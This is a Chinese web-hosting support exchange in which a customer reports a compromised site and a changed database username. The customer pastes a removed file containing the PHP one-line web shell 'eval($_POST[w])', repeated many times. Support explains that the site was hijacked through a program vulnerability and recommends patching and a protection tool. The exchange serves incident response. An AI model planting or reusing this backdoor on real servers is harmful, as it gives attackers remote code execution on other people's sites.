問:前天服務器中的網站souluo#數(shù)據(jù)庫的用戶名被人修改成aspnet,后面自己發(fā)現(xiàn)了又改回來,這是被入侵數(shù)據(jù)庫造成的嗎?
在服務器中的網站souluo#里面的plus文件中發(fā)現(xiàn)了一份文件,目前已經刪除了,類型如下:,打開后是這樣:
<?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?><?php eval($_POST[w]) ?>
請問這是什么東西,是別人上傳的一句話木馬嗎,服務器數(shù)據(jù)庫被修改同時被上傳了東西
答:您好,
1、您描述的的問題是站點被掛馬,站點被掛馬是程序漏洞導致,要徹底解決需要聯(lián)系程序商檢查并修復程序漏洞;
2、如果您已經清理了掛馬,可以在服務器上安裝一個安全防護軟件比如“云鎖”,
云鎖有設置防篡改功能,可以將之前被掛馬的文件設置為防篡改,可以在一定程度避免再次被掛馬;不過防護軟件如果設置不當,也可能影響站點訪問,因此在防護軟件做設置時請您先閱讀下防護軟件的官方幫助文檔;查看該服務器為亞數(shù)機房服務器,如果安裝了云鎖防護軟件,需要將ip地址127.0.0.1、127.0.0.1、127.0.0.1加入云鎖的ip白名單中;非常感謝您長期對我司的支持!